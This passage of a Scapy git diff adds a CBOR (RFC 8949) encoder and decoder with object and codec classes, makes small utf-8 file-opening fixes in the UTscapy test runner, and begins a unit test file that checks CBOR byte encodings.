value, # type: int + codec=None # type: Optional[Dict[CBORCodec, Type[CBORcodec_Object[Any]]]] # noqa: E501 + ): + # type: (...) -> None + EnumElement.__init__(self, key, value) + if codec is None: + codec = {} + self._codec = codec + + def clone(self): + # type: () -> CBORTag + return self.__class__(self._key, self._value, self._codec) + + def register_cbor_object(self, cborobj): + # type: (Type[CBOR_Object[Any]]) -> None + self._cbor_obj = cborobj + + def cbor_object(self, val): + # type: (Any) -> CBOR_Object[Any] + if hasattr(self, "_cbor_obj"): + return self._cbor_obj(val) + raise CBOR_Error("%r does not have any assigned CBOR object" % self) + + def register(self, codecnum, codec): + # type: (CBORCodec, Type[CBORcodec_Object[Any]]) -> None + self._codec[codecnum] = codec + + def get_codec(self, codec): + # type: (Any) -> Type[CBORcodec_Object[Any]] + try: + c = self._codec[codec] + except KeyError: + raise CBOR_Error("Codec %r not found for tag %r" % (codec, self)) + return c + + +class CBOR_MajorTypes_metaclass(Enum_metaclass): + element_class = CBORTag + + def __new__(cls, + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[CBOR_MajorTypes] + rdict = {} + for k, v in dct.items(): + if isinstance(v, int): + v = CBORTag(k, v) + dct[k] = v + rdict[v] = v + elif isinstance(v, CBORTag): + rdict[v] = v + dct["__rdict__"] = rdict + + ncls = cast('Type[CBOR_MajorTypes]', + type.__new__(cls, name, bases, dct)) + return ncls + + +class CBOR_MajorTypes(metaclass=CBOR_MajorTypes_metaclass): + """CBOR Major Types (RFC 8949)""" + name = "CBOR_MAJOR_TYPES" + # CBOR major types (3-bit value in the high-order 3 bits) + UNSIGNED_INTEGER = cast(CBORTag, 0) + NEGATIVE_INTEGER = cast(CBORTag, 1) + BYTE_STRING = cast(CBORTag, 2) + TEXT_STRING = cast(CBORTag, 3) + ARRAY = cast(CBORTag, 4) + MAP = cast(CBORTag, 5) + TAG = cast(CBORTag, 6) + SIMPLE_AND_FLOAT = cast(CBORTag, 7) + + +class CBOR_Object_metaclass(type): + def __new__(cls, + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[CBOR_Object[Any]] + c = cast( + 'Type[CBOR_Object[Any]]', + super(CBOR_Object_metaclass, cls).__new__(cls, name, bases, dct) + ) + try: + c.tag.register_cbor_object(c) + except Exception: + # Some objects may not have tags yet + log_runtime.warning("Failed to register CBOR object %r" % c) + return c + + +_K = TypeVar('_K') + + +class CBOR_Object(Generic[_K], metaclass=CBOR_Object_metaclass): + """Base class for CBOR value objects""" + tag = None # type: ignore # Subclasses must define their own tag + + def __init__(self, val): + # type: (_K) -> None + self.val = val + + def enc(self, codec=None): + # type: (Any) -> bytes + if codec is None: + codec = CBOR_Codecs.CBOR + if self.tag is None: + raise CBOR_Error("Cannot encode object without a tag") + # Pass self instead of self.val for special handling + return self.tag.get_codec(codec).enc(self) + + def __repr__(self): + # type: () -> str + return "<%s[%r]>" % (self.__class__.__name__, self.val) + + def __str__(self): + # type: () -> str + return plain_str(self.enc()) + + def __bytes__(self): + # type: () -> bytes + return self.enc() + + def strshow(self, lvl=0): + # type: (int) -> str + return (" " * lvl) + repr(self) + "\n" + + def show(self, lvl=0): + # type: (int) -> None + print(self.strshow(lvl)) + + def __eq__(self, other): + # type: (Any) -> bool + return bool(self.val == other) + + +####################### +# CBOR objects # +####################### + + +class CBOR_UNSIGNED_INTEGER(CBOR_Object[int]): + """CBOR unsigned integer (major type 0)""" + tag = CBOR_MajorTypes.UNSIGNED_INTEGER + + +class CBOR_NEGATIVE_INTEGER(CBOR_Object[int]): + """CBOR negative integer (major type 1)""" + tag = CBOR_MajorTypes.NEGATIVE_INTEGER + + +class CBOR_BYTE_STRING(CBOR_Object[bytes]): + """CBOR byte string (major type 2)""" + tag = CBOR_MajorTypes.BYTE_STRING + + +class CBOR_TEXT_STRING(CBOR_Object[str]): + """CBOR text string (major type 3)""" + tag = CBOR_MajorTypes.TEXT_STRING + + +class CBOR_ARRAY(CBOR_Object[List[Any]]): + """CBOR array (major type 4)""" + tag = CBOR_MajorTypes.ARRAY + + def strshow(self, lvl=0): + # type: (int) -> str + s = (" " * lvl) + ("# CBOR_ARRAY:") + "\n" + for o in self.val: + if hasattr(o, 'strshow'): + s += o.strshow(lvl=lvl + 1) + else: + s += (" " * (lvl + 1)) + repr(o) + "\n" + return s + + +class CBOR_MAP(CBOR_Object[Dict[Any, Any]]): + """CBOR map (major type 5)""" + tag = CBOR_MajorTypes.MAP + + def strshow(self, lvl=0): + # type: (int) -> str + s = (" " * lvl) + ("# CBOR_MAP:") + "\n" + for k, v in self.val.items(): + s += (" " * (lvl + 1)) + "Key: " + if hasattr(k, 'strshow'): + s += k.strshow(0).strip() + "\n" + else: + s += repr(k) + "\n" + s += (" " * (lvl + 1)) + "Value: " + if hasattr(v, 'strshow'): + s += v.strshow(0).strip() + "\n" + else: + s += repr(v) + "\n" + return s + + +class CBOR_SEMANTIC_TAG(CBOR_Object[Tuple[int, Any]]): + """CBOR semantic tag (major type 6)""" + tag = CBOR_MajorTypes.TAG + + +class CBOR_SIMPLE_VALUE(CBOR_Object[int]): + """CBOR simple value (major type 7)""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + +class CBOR_FALSE(CBOR_Object[bool]): + """CBOR false value""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self): + # type: () -> None + super(CBOR_FALSE, self).__init__(False) + + +class CBOR_TRUE(CBOR_Object[bool]): + """CBOR true value""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self): + # type: () -> None + super(CBOR_TRUE, self).__init__(True) + + +class CBOR_NULL(CBOR_Object[None]): + """CBOR null value""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self): + # type: () -> None + super(CBOR_NULL, self).__init__(None) + + +class CBOR_UNDEFINED(CBOR_Object[None]): + """CBOR undefined value""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + def __init__(self): + # type: () -> None + super(CBOR_UNDEFINED, self).__init__(None) + + +class CBOR_FLOAT(CBOR_Object[float]): + """CBOR floating-point number (major type 7)""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + +class _CBOR_ERROR(CBOR_Object[Union[bytes, CBOR_Object[Any]]]): + """CBOR decoding error wrapper""" + tag = None # type: ignore # Error objects don't have a CBOR tag + + +class CBOR_DECODING_ERROR(_CBOR_ERROR): + """CBOR decoding error object""" + + def __init__(self, val, exc=None): + # type: (Union[bytes, CBOR_Object[Any]], Optional[Exception]) -> None + CBOR_Object.__init__(self, val) + self.exc = exc + + def __repr__(self): + # type: () -> str + return "<%s[%r]{{%r}}>" % ( + self.__class__.__name__, + self.val, + self.exc and self.exc.args[0] or "" + ) + + def enc(self, codec=None): + # type: (Any) -> bytes + if isinstance(self.val, CBOR_Object): + return self.val.enc(codec) + return self.val # type: ignore diff --git a/scapy/cbor/cborcodec.py b/scapy/cbor/cborcodec.py new file mode 100644 index 00000000000..b49b9d38b30 --- /dev/null +++ b/scapy/cbor/cborcodec.py @@ -0,0 +1,706 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +CBOR Codec Implementation - RFC 8949 +Following the BER paradigm for ASN.1 +""" + +import struct +from typing import ( + Any, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + cast, +) + +from scapy.cbor.cbor import ( + CBOR_Codecs, + CBOR_DECODING_ERROR, + CBOR_Decoding_Error, + CBOR_Encoding_Error, + CBOR_Error, + CBOR_MajorTypes, + CBOR_Object, + _CBOR_ERROR, +) +from scapy.compat import chb, orb +from scapy.error import log_runtime + + +################## +# CBOR encoding # +################## + + +class CBOR_Exception(Exception): + pass + + +class CBOR_Codec_Encoding_Error(CBOR_Encoding_Error): + def __init__(self, + msg, # type: str + encoded=None, # type: Optional[Any] + remaining=b"" # type: bytes + ): + # type: (...) -> None + Exception.__init__(self, msg) + self.remaining = remaining + self.encoded = encoded + + +class CBOR_Codec_Decoding_Error(CBOR_Decoding_Error): + def __init__(self, + msg, # type: str + decoded=None, # type: Optional[Any] + remaining=b"" # type: bytes + ): + # type: (...) -> None + Exception.__init__(self, msg) + self.remaining = remaining + self.decoded = decoded + + +def CBOR_encode_head(major_type, value): + # type: (int, int) -> bytes + """ + Encode CBOR initial byte and additional info. + Format: 3 bits major type + 5 bits additional info + """ + if value < 24: + # Value fits in 5 bits + return chb((major_type << 5) | value) + elif value < 256: + # 1-byte value follows + return chb((major_type << 5) | 24) + chb(value) + elif value < 65536: + # 2-byte value follows + return chb((major_type << 5) | 25) + struct.pack(">H", value) + elif value < 4294967296: + # 4-byte value follows + return chb((major_type << 5) | 26) + struct.pack(">I", value) + else: + # 8-byte value follows + return chb((major_type << 5) | 27) + struct.pack(">Q", value) + + +def CBOR_decode_head(s): + # type: (bytes) -> Tuple[int, int, bytes] + """ + Decode CBOR initial byte and additional info. + Returns: (major_type, value, remaining_bytes) + """ + if not s: + raise CBOR_Codec_Decoding_Error("Empty CBOR data", remaining=s) + + initial_byte = orb(s[0]) + major_type = initial_byte >> 5 + additional_info = initial_byte & 0x1f + + if additional_info < 24: + # Value is in the additional info + return major_type, additional_info, s[1:] + elif additional_info == 24: + # 1-byte value follows + if len(s) < 2: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for 1-byte value", remaining=s) + return major_type, orb(s[1]), s[2:] + elif additional_info == 25: + # 2-byte value follows + if len(s) < 3: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for 2-byte value", remaining=s) + value = struct.unpack(">H", s[1:3])[0] + return major_type, value, s[3:] + elif additional_info == 26: + # 4-byte value follows + if len(s) < 5: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for 4-byte value", remaining=s) + value = struct.unpack(">I", s[1:5])[0] + return major_type, value, s[5:] + elif additional_info == 27: + # 8-byte value follows + if len(s) < 9: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for 8-byte value", remaining=s) + value = struct.unpack(">Q", s[1:9])[0] + return major_type, value, s[9:] + else: + raise CBOR_Codec_Decoding_Error( + "Invalid additional info: %d" % additional_info, remaining=s) + + +# [ CBOR codec classes ] # + + +class CBORcodec_metaclass(type): + def __new__(cls, + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[CBORcodec_Object[Any]] + c = cast('Type[CBORcodec_Object[Any]]', + super(CBORcodec_metaclass, cls).__new__(cls, name, bases, dct)) + try: + c.tag.register(c.codec, c) + except Exception: + log_runtime.error("Failed to register codec for tag") + return c + + +_K = TypeVar('_K') + + +class CBORcodec_Object(Generic[_K], metaclass=CBORcodec_metaclass): + """Base CBOR codec class""" + codec = CBOR_Codecs.CBOR + tag = CBOR_MajorTypes.UNSIGNED_INTEGER + + @classmethod + def cbor_object(cls, val): + # type: (_K) -> CBOR_Object[_K] + return cls.tag.cbor_object(val) + + @classmethod + def check_string(cls, s): + # type: (bytes) -> None + if not s: + raise CBOR_Codec_Decoding_Error( + "%s: Got empty object while expecting tag %r" % + (cls.__name__, cls.tag), remaining=s + ) + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[Any], bytes] + """Decode CBOR data using automatic dispatch based on major type.""" + return _decode_cbor_item(s, safe=safe) + + @classmethod + def dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[Union[_CBOR_ERROR, CBOR_Object[_K]], bytes] + if not safe: + return cls.do_dec(s, context, safe) + try: + return cls.do_dec(s, context, safe) + except CBOR_Codec_Decoding_Error as e: + return CBOR_DECODING_ERROR(s, exc=e), b"" + except CBOR_Error as e: + return CBOR_DECODING_ERROR(s, exc=e), b"" + + @classmethod + def safedec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + ): + # type: (...) -> Tuple[Union[_CBOR_ERROR, CBOR_Object[_K]], bytes] + return cls.dec(s, context, safe=True) + + @classmethod + def enc(cls, s): + # type: (_K) -> bytes + raise NotImplementedError("Subclasses must implement enc") + + +CBOR_Codecs.CBOR.register_stem(CBORcodec_Object) + + +########################## +# CBORcodec objects # +########################## + + +class CBORcodec_UNSIGNED_INTEGER(CBORcodec_Object[int]): + """CBOR unsigned integer codec (major type 0)""" + tag = CBOR_MajorTypes.UNSIGNED_INTEGER + + @classmethod + def enc(cls, obj): + # type: (Union[int, CBOR_Object[int]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + i = obj.val if isinstance(obj, CBOR_Object) else obj + if i < 0: + raise CBOR_Codec_Encoding_Error( + "Cannot encode negative value as unsigned integer. " + "Use CBOR_NEGATIVE_INTEGER for negative values.") + return CBOR_encode_head(0, i) + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[int], bytes] + cls.check_string(s) + major_type, value, remainder = CBOR_decode_head(s) + if major_type != 0: + raise CBOR_Codec_Decoding_Error( + "Expected major type 0 (unsigned integer), got %d" % major_type, + remaining=s) + return cls.cbor_object(value), remainder + + +class CBORcodec_NEGATIVE_INTEGER(CBORcodec_Object[int]): + """CBOR negative integer codec (major type 1)""" + tag = CBOR_MajorTypes.NEGATIVE_INTEGER + + @classmethod + def enc(cls, obj): + # type: (Union[int, CBOR_Object[int]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + i = obj.val if isinstance(obj, CBOR_Object) else obj + if i >= 0: + raise CBOR_Codec_Encoding_Error( + "Cannot encode non-negative value as negative integer. " + "Use CBOR_UNSIGNED_INTEGER for non-negative values.") + # CBOR negative integer: -1 - n + return CBOR_encode_head(1, -1 - i) + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[int], bytes] + cls.check_string(s) + major_type, value, remainder = CBOR_decode_head(s) + if major_type != 1: + raise CBOR_Codec_Decoding_Error( + "Expected major type 1 (negative integer), got %d" % major_type, + remaining=s) + # Decode: -1 - n + return cls.cbor_object(-1 - value), remainder + + +class CBORcodec_BYTE_STRING(CBORcodec_Object[bytes]): + """CBOR byte string codec (major type 2)""" + tag = CBOR_MajorTypes.BYTE_STRING + + @classmethod + def enc(cls, obj): + # type: (Union[bytes, CBOR_Object[bytes]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + data = obj.val if isinstance(obj, CBOR_Object) else obj + if not isinstance(data, bytes): + data = bytes(data) + return CBOR_encode_head(2, len(data)) + data + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[bytes], bytes] + cls.check_string(s) + major_type, length, remainder = CBOR_decode_head(s) + if major_type != 2: + raise CBOR_Codec_Decoding_Error( + "Expected major type 2 (byte string), got %d" % major_type, + remaining=s) + if len(remainder) < length: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for byte string: expected %d, got %d" % + (length, len(remainder)), remaining=s) + return cls.cbor_object(remainder[:length]), remainder[length:] + + +class CBORcodec_TEXT_STRING(CBORcodec_Object[str]): + """CBOR text string codec (major type 3)""" + tag = CBOR_MajorTypes.TEXT_STRING + + @classmethod + def enc(cls, obj): + # type: (Union[str, CBOR_Object[str]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + text = obj.val if isinstance(obj, CBOR_Object) else obj + if isinstance(text, str): + text_bytes = text.encode('utf-8') + else: + text_bytes = bytes(text) + return CBOR_encode_head(3, len(text_bytes)) + text_bytes + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[str], bytes] + cls.check_string(s) + major_type, length, remainder = CBOR_decode_head(s) + if major_type != 3: + raise CBOR_Codec_Decoding_Error( + "Expected major type 3 (text string), got %d" % major_type, + remaining=s) + if len(remainder) < length: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for text string: expected %d, got %d" % + (length, len(remainder)), remaining=s) + try: + text = remainder[:length].decode('utf-8') + except UnicodeDecodeError as e: + raise CBOR_Codec_Decoding_Error( + "Invalid UTF-8 in text string: %s" % str(e), remaining=s) + return cls.cbor_object(text), remainder[length:] + + +class CBORcodec_ARRAY(CBORcodec_Object[List[Any]]): + """CBOR array codec (major type 4)""" + tag = CBOR_MajorTypes.ARRAY + + @classmethod + def enc(cls, obj): + # type: (Union[List[Any], CBOR_Object[List[Any]]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + array = obj.val if isinstance(obj, CBOR_Object) else obj + result = CBOR_encode_head(4, len(array)) + for item in array: + result += CBORcodec_Object.encode_cbor_item(item) + return result + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[List[Any]], bytes] + cls.check_string(s) + major_type, length, remainder = CBOR_decode_head(s) + if major_type != 4: + raise CBOR_Codec_Decoding_Error( + "Expected major type 4 (array), got %d" % major_type, + remaining=s) + + items = [] + for _ in range(length): + if not remainder: + raise CBOR_Codec_Decoding_Error( + "Not enough items in array", remaining=s) + item, remainder = CBORcodec_Object.decode_cbor_item( + remainder, safe=safe) + items.append(item) + + return cls.cbor_object(items), remainder + + +class CBORcodec_MAP(CBORcodec_Object[Dict[Any, Any]]): + """CBOR map codec (major type 5)""" + tag = CBOR_MajorTypes.MAP + + @classmethod + def enc(cls, obj): + # type: (Union[Dict[Any, Any], CBOR_Object[Dict[Any, Any]]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + mapping = obj.val if isinstance(obj, CBOR_Object) else obj + result = CBOR_encode_head(5, len(mapping)) + for key, value in mapping.items(): + result += CBORcodec_Object.encode_cbor_item(key) + result += CBORcodec_Object.encode_cbor_item(value) + return result + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[Dict[Any, Any]], bytes] + cls.check_string(s) + major_type, length, remainder = CBOR_decode_head(s) + if major_type != 5: + raise CBOR_Codec_Decoding_Error( + "Expected major type 5 (map), got %d" % major_type, + remaining=s) + + mapping = {} + for _ in range(length): + if not remainder: + raise CBOR_Codec_Decoding_Error( + "Not enough key-value pairs in map", remaining=s) + key, remainder = CBORcodec_Object.decode_cbor_item( + remainder, safe=safe) + if not remainder: + raise CBOR_Codec_Decoding_Error( + "Map key without value", remaining=s) + value, remainder = CBORcodec_Object.decode_cbor_item( + remainder, safe=safe) + # Convert key to hashable type if it's a CBOR object + if isinstance(key, CBOR_Object): + key_val = key.val + else: + key_val = key + mapping[key_val] = value + + return cls.cbor_object(mapping), remainder + + +class CBORcodec_SEMANTIC_TAG(CBORcodec_Object[Tuple[int, Any]]): + """CBOR semantic tag codec (major type 6)""" + tag = CBOR_MajorTypes.TAG + + @classmethod + def enc(cls, obj): + # type: (Union[Tuple[int, Any], CBOR_Object[Tuple[int, Any]]]) -> bytes + from scapy.cbor.cbor import CBOR_Object + tagged_item = obj.val if isinstance(obj, CBOR_Object) else obj + tag_num, item = tagged_item + result = CBOR_encode_head(6, tag_num) + result += CBORcodec_Object.encode_cbor_item(item) + return result + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[Tuple[int, Any]], bytes] + cls.check_string(s) + major_type, tag_num, remainder = CBOR_decode_head(s) + if major_type != 6: + raise CBOR_Codec_Decoding_Error( + "Expected major type 6 (tag), got %d" % major_type, + remaining=s) + + if not remainder: + raise CBOR_Codec_Decoding_Error( + "Tag without following item", remaining=s) + + item, remainder = CBORcodec_Object.decode_cbor_item( + remainder, safe=safe) + return cls.cbor_object((tag_num, item)), remainder + + +class CBORcodec_SIMPLE_AND_FLOAT(CBORcodec_Object[Union[int, float, bool, None]]): + """CBOR simple values and floats codec (major type 7)""" + tag = CBOR_MajorTypes.SIMPLE_AND_FLOAT + + @classmethod + def enc(cls, obj): + # type: (Union[int, float, bool, None, CBOR_Object[Any]]) -> bytes + from scapy.cbor.cbor import ( + CBOR_FALSE, CBOR_TRUE, CBOR_NULL, CBOR_UNDEFINED, CBOR_Object + ) + + # Check if obj is a CBOR object instance (for special cases like UNDEFINED) + if isinstance(obj, CBOR_UNDEFINED): + return chb(0xf7) # undefined + elif isinstance(obj, CBOR_NULL): + return chb(0xf6) # null + elif isinstance(obj, CBOR_TRUE): + return chb(0xf5) # true + elif isinstance(obj, CBOR_FALSE): + return chb(0xf4) # false + elif isinstance(obj, CBOR_Object): + # For other CBOR objects, use their val attribute + val = obj.val + else: + val = obj + + if val is False: + return chb(0xf4) # false + elif val is True: + return chb(0xf5) # true + elif val is None: + return chb(0xf6) # null + elif isinstance(val, float): + # Encode as double precision (8 bytes) + return chb(0xfb) + struct.pack(">d", val) + elif isinstance(val, int) and 0 <= val <= 23: + # Simple value 0-23 + return CBOR_encode_head(7, val) + else: + raise CBOR_Codec_Encoding_Error( + "Cannot encode value as simple/float: %r" % val) + + @classmethod + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Any] + safe=False, # type: bool + ): + # type: (...) -> Tuple[CBOR_Object[Any], bytes] + from scapy.cbor.cbor import ( + CBOR_FALSE, CBOR_TRUE, CBOR_NULL, CBOR_UNDEFINED, + CBOR_FLOAT, CBOR_SIMPLE_VALUE + ) + + cls.check_string(s) + + # For major type 7, we need special handling because additional_info + # encodes different things (simple values vs float sizes) + initial_byte = orb(s[0]) + major_type = initial_byte >> 5 + additional_info = initial_byte & 0x1f + + if major_type != 7: + raise CBOR_Codec_Decoding_Error( + "Expected major type 7 (simple/float), got %d" % major_type, + remaining=s) + + # Check for special simple values (encoded directly in additional_info) + if additional_info == 20: + return CBOR_FALSE(), s[1:] + elif additional_info == 21: + return CBOR_TRUE(), s[1:] + elif additional_info == 22: + return CBOR_NULL(), s[1:] + elif additional_info == 23: + return CBOR_UNDEFINED(), s[1:] + elif additional_info == 25: + # Half precision float (2 bytes) - IEEE 754 binary16 + if len(s) < 3: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for half float", remaining=s) + half_bytes = s[1:3] + remainder = s[3:] + # Convert IEEE 754 binary16 to binary64 (double) + half_int = struct.unpack(">H", half_bytes)[0] + sign = (half_int >> 15) & 0x1 + exponent = (half_int >> 10) & 0x1f + fraction = half_int & 0x3ff + + # Handle special cases + if exponent == 0: + if fraction == 0: + # Zero + float_val = -0.0 if sign else 0.0 + else: + # Subnormal number + float_val = ((-1) ** sign) * (fraction / 1024.0) * (2 ** -14) + elif exponent == 31: + if fraction == 0: + # Infinity + float_val = float('-inf') if sign else float('inf') + else: + # NaN + float_val = float('nan') + else: + # Normalized number + float_val = ( + ((-1) ** sign) * + (1 + fraction / 1024.0) * + (2 ** (exponent - 15))) + + return CBOR_FLOAT(float_val), remainder + elif additional_info == 26: + # Single precision float (4 bytes) + if len(s) < 5: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for single float", remaining=s) + float_val = struct.unpack(">f", s[1:5])[0] + return CBOR_FLOAT(float_val), s[5:] + elif additional_info == 27: + # Double precision float (8 bytes) + if len(s) < 9: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for double float", remaining=s) + float_val = struct.unpack(">d", s[1:9])[0] + return CBOR_FLOAT(float_val), s[9:] + elif additional_info < 24: + # Simple value 0-23 + return CBOR_SIMPLE_VALUE(additional_info), s[1:] + else: + # additional_info 24 means 1-byte simple value follows + if additional_info == 24: + if len(s) < 2: + raise CBOR_Codec_Decoding_Error( + "Not enough bytes for simple value", remaining=s) + return CBOR_SIMPLE_VALUE(orb(s[1])), s[2:] + else: + raise CBOR_Codec_Decoding_Error( + "Invalid additional info for major type 7: %d" % additional_info, + remaining=s) + + +# Helper methods for encoding/decoding arbitrary CBOR items + + +def _encode_cbor_item(item): + # type: (Any) -> bytes + """Encode a Python value to CBOR bytes""" + from scapy.cbor.cbor import CBOR_Object + + if isinstance(item, CBOR_Object): + return item.enc() + elif isinstance(item, bool): + # Must check bool before int (bool is subclass of int) + return CBORcodec_SIMPLE_AND_FLOAT.enc(item) + elif isinstance(item, int): + if item >= 0: + return CBORcodec_UNSIGNED_INTEGER.enc(item) + else: + return CBORcodec_NEGATIVE_INTEGER.enc(item) + elif isinstance(item, bytes): + return CBORcodec_BYTE_STRING.enc(item) + elif isinstance(item, str): + return CBORcodec_TEXT_STRING.enc(item) + elif isinstance(item, list): + return CBORcodec_ARRAY.enc(item) + elif isinstance(item, dict): + return CBORcodec_MAP.enc(item) + elif isinstance(item, float): + return CBORcodec_SIMPLE_AND_FLOAT.enc(item) + elif item is None: + return CBORcodec_SIMPLE_AND_FLOAT.enc(None) + else: + raise CBOR_Codec_Encoding_Error( + "Cannot encode type: %s" % type(item)) + + +def _decode_cbor_item(s, safe=False): + # type: (bytes, bool) -> Tuple[CBOR_Object[Any], bytes] + """Decode CBOR bytes to a CBOR_Object""" + if not s: + raise CBOR_Codec_Decoding_Error("Empty CBOR data", remaining=s) + + initial_byte = orb(s[0]) + major_type = initial_byte >> 5 + + # Dispatch to appropriate codec based on major type + if major_type == 0: + return CBORcodec_UNSIGNED_INTEGER.dec(s, safe=safe) + elif major_type == 1: + return CBORcodec_NEGATIVE_INTEGER.dec(s, safe=safe) + elif major_type == 2: + return CBORcodec_BYTE_STRING.dec(s, safe=safe) + elif major_type == 3: + return CBORcodec_TEXT_STRING.dec(s, safe=safe) + elif major_type == 4: + return CBORcodec_ARRAY.dec(s, safe=safe) + elif major_type == 5: + return CBORcodec_MAP.dec(s, safe=safe) + elif major_type == 6: + return CBORcodec_SEMANTIC_TAG.dec(s, safe=safe) + elif major_type == 7: + return CBORcodec_SIMPLE_AND_FLOAT.dec(s, safe=safe) + else: + raise CBOR_Codec_Decoding_Error( + "Invalid major type: %d" % major_type, remaining=s) + + +# Add helper methods to CBORcodec_Object +CBORcodec_Object.encode_cbor_item = staticmethod(_encode_cbor_item) +CBORcodec_Object.decode_cbor_item = staticmethod(_decode_cbor_item) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index d778edebe77..119775b0258 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -330,7 +330,7 @@ def parse_config_file(config_path, verb=3): } """ - with open(config_path) as config_file: + with open(config_path, encoding='utf-8') as config_file: data = json.load(config_file) if verb > 2: print(" %s Loaded config file" % arrow, config_path) @@ -473,7 +473,7 @@ def compute_campaign_digests(test_campaign): ts.crc = crc32(dts) dc += "\0\x01" + dts test_campaign.crc = crc32(dc) - with open(test_campaign.filename) as fdesc: + with open(test_campaign.filename, encoding='utf-8') as fdesc: test_campaign.sha = sha1(fdesc.read()) @@ -1188,7 +1188,7 @@ def main(): if VERB > 2: print(theme.green(dash + " Loading: %s" % TESTFILE)) PREEXEC = PREEXEC_DICT[TESTFILE] if TESTFILE in PREEXEC_DICT else GLOB_PREEXEC - with open(TESTFILE) as testfile: + with open(TESTFILE, encoding='utf-8') as testfile: output, result, campaign = execute_campaign( testfile, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, diff --git a/test/scapy/layers/cbor.uts b/test/scapy/layers/cbor.uts new file mode 100644 index 00000000000..f56d116a505 --- /dev/null +++ b/test/scapy/layers/cbor.uts @@ -0,0 +1,994 @@ +% Tests for CBOR encoding/decoding +# Following the ASN.1 test paradigm +# +# Try me with: +# bash test/run_tests -t test/scapy/layers/cbor.uts -F +# +# NOTE: Interoperability tests require cbor2 (test-only dependency): +# pip install cbor2 +# cbor2 is used ONLY in tests, NOT in the scapy CBOR implementation + +########### CBOR Basic Types ####################################### + ++ CBOR Unsigned Integer + += Encode small unsigned integer (0-23) +from scapy.cbor import * +obj = CBOR_UNSIGNED_INTEGER(0) +bytes(obj) == b'\x00' + += Encode unsigned integer with 1-byte value +obj = CBOR_UNSIGNED_INTEGER(24) +bytes(obj) == b'\x18\x18' + += Encode unsigned integer with 2-byte value +obj = CBOR_UNSIGNED_INTEGER(1000) +bytes(obj) == b'\x19\x03\xe8' + += Encode unsigned integer with 4-byte value +obj = CBOR_UNSIGNED_INTEGER(1000000) +bytes(obj) == b'\x1a\x00\x0f\x42\x40' + += Decode small unsigned integer +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x00') +obj.val == 0 and remainder == b'' + += Decode unsigned integer with 1-byte value +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x18\x18') +obj.val == 24 and remainder == b'' + += Decode unsigned integer with 2-byte value +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x19\x03\xe8') +obj.val == 1000 and remainder == b'' + ++ CBOR Negative Integer + += Encode negative integer -1 +obj = CBOR_NEGATIVE_INTEGER(-1) +bytes(obj) == b'\x20' + += Encode negative integer -10 +obj = CBOR_NEGATIVE_INTEGER(-10) +bytes(obj) == b'\x29' + += Encode negative integer -100 +obj = CBOR_NEGATIVE_INTEGER(-100) +bytes(obj) == b'\x38\x63' + += Decode negative integer -1 +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x20') +obj.val == -1 and remainder == b'' + += Decode negative integer -100 +obj, remainder = CBOR_Codecs.CBOR.dec(b'\x38\x63') +obj.val == -100 and remainder == b'' + ++ CBOR Byte String + += Encode empty byte string +obj = CBOR_BYTE_STRING(b'') +bytes(obj) == b'\x40' + += Encode byte string +obj = CBOR_BYTE_STRING(b'hello') +bytes(obj) == b'\x45hello' + += Decode empty byte 